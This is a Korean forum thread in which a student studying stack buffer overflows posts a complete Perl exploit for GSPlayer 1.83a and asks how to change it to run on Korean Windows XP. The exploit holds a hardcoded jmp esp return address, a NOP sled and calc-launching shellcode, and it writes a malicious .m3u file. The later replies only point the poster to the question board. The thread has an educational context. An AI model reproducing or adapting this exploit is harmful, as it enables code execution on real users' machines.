질문하나 있습니다!!아! 아니 두개...

익명 사용자의 이미지

안녕하세요 ㅠㅠㅠ 밑에 글올렸던 글쓴이 입니다
KLDP댓글 덕분에 이제 소스분석도 다하고 올리디버거로 스택메모리 구조도 보면서 공부하고 잇숨니돠....
근데 이제 이걸 실행해보고 싶은데 환경이 안맞아서 실행을 못하고 잇습니다( Windows XP SP3 KR버전이라서 그런지...)
이 플레이어를 열어 m3u파일을 실행하면 계산기 프로그램이 돌아가는것인데
환경이 맞는곳을 찾을 수 없다고 과제내주신분께 여쭤봣는데
제가 소스를 통해 환경을 바꿔야 한다는 군요
이 소스에서 뭘바꾸면
실행이 될까요?

고수신 횽님들
부탁드립니다

# Exploit Title: GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability

# Date: 2010/11/04

# Author: moigai

# e-mail: again.liu@gmail.com

# Software Link: http://www.vector.co.jp/download/file/win95/art/fh296344.html

# Version: 1.83a Win32 Release

# Tested on: Windows XP SP3 En (VM)

my $file = "GSPlayer.m3u";

my $junk1 = "\x41" x 257;

#jmp esp from kernel32.dll

my $eip = pack('V',0x7C86467B);

my $junk2 = "Ai7Ai8Ai";

my $nop = "\x90" x 30;

#executes calc

my $shell =

"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .

"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .

"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .

"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .

"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .

"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .

"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .

"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .

"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .

"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .

"\x7f\xe8\x7b\xca";

my $payload = $junk1 . $eip . $junk2 . $nop . $shell;

my $rest = "\x42" x (4064 - length($payload));

$payload = $payload . $rest . ".mp3";


아!여기서 중요한것이 어떤 함수에 의해 문제가 되는지 어떤것으로 인해 스탤 버퍼오버플로우가 실행되는지 알아야한다고 해서 jmp esp때문에 일어나는 것이 아닌가했지만 정답이 아니랍니다.ㅠㅠㅠ
전 주소를 바꿨기 때문에 일어낫다고 생각이되는데 고수님들은 어찌생각하시는지...
print "\n[+] Creating m3u file\n";

open(FILE, ">$file");

print FILE $payload;

close(FILE);

print "[+] File " . $file . " created\n";

익명 사용자의 이미지

이거 이미 올라왔던 질문입니다. 찾아보시고, 구글링도 해보세요. 그냥 나오더군요.

익명 사용자의 이미지

아.. 이거 올리셨던 분이 추가질문을 올리셨군요.

추가질문일 경우에 별도의 글을 새로 쓰지 마시고 원래 글에 올리시는것이 맞겠지요.

익명 사용자의 이미지

아! 알겠습니다 아직 몰라서 다음부터는 ! ㅠㅠ

snowall의 이미지

질문은 질문게시판으로...

피할 수 있을때 즐겨라! http://melotopia.net/b

익명 사용자의 이미지

질문게시판이 없는...ㅠㅠㅠㅠ아 어딧나요 ㅠㅠㅠ 저의 질문은 어디에~~~~~~~~~~오매~~~~~~~~~~~~~~~~~~~~~~~~~~

snowall의 이미지

피할 수 있을때 즐겨라! http://melotopia.net/b

Stand Alone Complex의 이미지

질문은 질문게시판으로... (2)

RET ;My life :P